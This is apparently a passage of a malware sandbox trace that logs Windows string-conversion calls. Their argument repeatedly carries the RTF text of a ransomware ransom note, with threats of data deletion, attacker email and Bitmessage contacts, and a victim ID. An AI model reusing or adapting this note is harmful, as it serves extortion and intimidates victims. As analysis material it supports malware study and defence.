w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 